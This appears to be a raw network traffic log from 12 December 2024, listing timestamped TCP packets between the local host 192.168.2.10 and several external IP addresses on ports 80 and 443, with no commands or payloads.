                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:22.811574936 CET4988480192.168.2.10185.215.113.43
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:22.814153910 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:22.814436913 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:22.934129000 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:22.934448004 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:22.934582949 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:22.937774897 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:22.948869944 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.068628073 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.343727112 CET44349878172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.343828917 CET49878443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.358963013 CET44349878172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.359061956 CET49878443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.463284969 CET44349878172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.463370085 CET49878443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.467381954 CET44349878172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.467483044 CET49878443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.468605995 CET44349878172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.468684912 CET49878443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.536170959 CET44349878172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.538678885 CET49878443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.540261030 CET44349878172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.540313005 CET49878443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.540326118 CET44349878172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.541785002 CET49878443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.545669079 CET44349878172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.545744896 CET49878443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.553278923 CET44349878172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.554574013 CET49878443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.554584980 CET44349878172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.554625988 CET49878443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.562437057 CET44349878172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.566359043 CET49878443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.566365004 CET44349878172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.566414118 CET49878443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.571471930 CET44349878172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.573765993 CET49878443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.578727961 CET44349878172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.582317114 CET49878443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.582494020 CET44349878172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.582544088 CET49878443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.592171907 CET44349878172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.594177008 CET49878443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.595122099 CET44349878172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.595172882 CET49878443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.605880022 CET44349878172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.610358953 CET49878443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.610378027 CET44349878172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.610430002 CET49878443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.619697094 CET44349878172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.623614073 CET49878443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.623625994 CET44349878172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.623671055 CET49878443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.633116961 CET44349878172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.633872032 CET49878443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.636115074 CET44349878172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.636189938 CET49878443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.646812916 CET44349878172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.649787903 CET49878443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.649818897 CET44349878172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.649866104 CET49878443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.660511971 CET44349878172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.661803007 CET49878443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.661809921 CET44349878172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.661853075 CET49878443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.674159050 CET44349878172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.677886009 CET49878443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.700359106 CET44349878172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.702538013 CET49878443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.702567101 CET44349878172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.702626944 CET49878443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.728389978 CET44349878172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.728596926 CET49878443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.728612900 CET44349878172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.728655100 CET49878443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.730386019 CET44349878172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.731583118 CET49878443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.734838009 CET44349878172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.738782883 CET44349878172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.738818884 CET44349878172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.738878012 CET49878443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.738889933 CET44349878172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.738909960 CET49878443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.738929033 CET49878443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.749011993 CET44349878172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.749063969 CET44349878172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.749144077 CET49878443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.749155998 CET44349878172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.749195099 CET49878443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.760159969 CET44349878172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.763612986 CET49878443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.763627052 CET44349878172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.763668060 CET49878443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.770874023 CET44349878172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.771737099 CET49878443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.771764994 CET44349878172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.771821022 CET49878443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.780517101 CET44349878172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.780589104 CET49878443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.780775070 CET44349878172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.780852079 CET49878443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.790683031 CET44349878172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.790738106 CET49878443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.790745974 CET44349878172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.790811062 CET49878443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.800872087 CET44349878172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.800939083 CET49878443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.801053047 CET44349878172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.801110029 CET49878443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.804677963 CET44349889216.58.208.238192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.804889917 CET49889443192.168.2.10216.58.208.238
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.805800915 CET44349889216.58.208.238192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.805897951 CET49889443192.168.2.10216.58.208.238
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.809654951 CET49889443192.168.2.10216.58.208.238
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.809664965 CET44349889216.58.208.238192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.810066938 CET44349889216.58.208.238192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.810163021 CET49889443192.168.2.10216.58.208.238
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.810898066 CET44349878172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.810961008 CET49878443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.810970068 CET44349878172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.811012983 CET49878443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.811976910 CET49889443192.168.2.10216.58.208.238
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.820962906 CET44349878172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.821031094 CET49878443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.821044922 CET44349878172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.821083069 CET49878443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.831119061 CET44349878172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.831197023 CET49878443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.831228971 CET44349878172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.831340075 CET49878443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.840692997 CET44349878172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.840769053 CET49878443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.840815067 CET44349878172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.840862036 CET49878443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.849591017 CET44349878172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.851579905 CET49878443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.851588964 CET44349878172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.851632118 CET49878443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.855339050 CET44349889216.58.208.238192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.858866930 CET44349878172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.858928919 CET49878443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.859086037 CET44349878172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.859421968 CET49878443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.867721081 CET44349878172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.867779016 CET49878443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.867850065 CET44349878172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.867971897 CET49878443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.867979050 CET44349878172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.868026972 CET49878443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.869131088 CET44349878172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.869185925 CET49878443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.875890017 CET44349878172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.878384113 CET49878443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.878393888 CET44349878172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.878436089 CET49878443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.884507895 CET44349878172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.885732889 CET49878443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.885744095 CET44349878172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.885787010 CET49878443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.890630007 CET44349878172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.891593933 CET49878443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.892020941 CET44349878172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.892070055 CET49878443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.896800995 CET44349878172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.899727106 CET49878443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.899738073 CET44349878172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.899785995 CET49878443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.903178930 CET44349878172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.903235912 CET49878443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.904432058 CET44349878172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.904484987 CET49878443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.909413099 CET44349878172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.909472942 CET49878443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.910525084 CET44349878172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.910573006 CET49878443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.920644045 CET44349878172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.920711994 CET49878443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.921982050 CET44349878172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.922029972 CET49878443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.922561884 CET44349878172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.922607899 CET49878443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.927083015 CET44349878172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.927129984 CET49878443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.951611996 CET44349878172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.951869965 CET44349878172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.951956987 CET49878443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.951966047 CET44349878172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.951994896 CET44349878172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.952017069 CET49878443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.952042103 CET49878443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.952084064 CET44349878172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.952135086 CET49878443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.952172995 CET44349878172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.952217102 CET49878443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.952261925 CET44349878172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.952311993 CET49878443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.952351093 CET44349878172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.952398062 CET49878443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.952440023 CET44349878172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.952486992 CET49878443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.952536106 CET44349878172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.952588081 CET49878443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.953661919 CET44349878172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.953716993 CET49878443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.953790903 CET44349878172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.953836918 CET49878443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.959240913 CET44349878172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.959610939 CET49878443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.959618092 CET44349878172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.959659100 CET49878443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.964724064 CET44349878172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.967593908 CET49878443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.967602015 CET44349878172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.967644930 CET49878443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.969187975 CET44349878172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.969240904 CET49878443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.969420910 CET44349878172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.969466925 CET49878443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.973800898 CET44349878172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.975572109 CET49878443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.975579023 CET44349878172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.975616932 CET49878443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.978609085 CET44349878172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.978687048 CET49878443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.978699923 CET44349878172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.978748083 CET49878443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.983341932 CET44349878172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.983409882 CET49878443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.983459949 CET44349878172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.983597994 CET49878443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.988373995 CET44349878172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.988440990 CET49878443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.988523960 CET44349878172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.988576889 CET49878443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.993232012 CET44349878172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.995592117 CET49878443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.995598078 CET44349878172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:23.995636940 CET49878443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.006788015 CET44349878172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.006872892 CET49878443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.006886005 CET44349878172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.006925106 CET49878443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.007085085 CET49878443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.007136106 CET44349878172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.007186890 CET49878443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.265642881 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.265769958 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.265783072 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.265795946 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.265870094 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.265873909 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.265882969 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.265916109 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.265928030 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.265937090 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.265940905 CET804989031.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.265954018 CET4989080192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.265976906 CET4989080192.168.2.1031.41.244.11
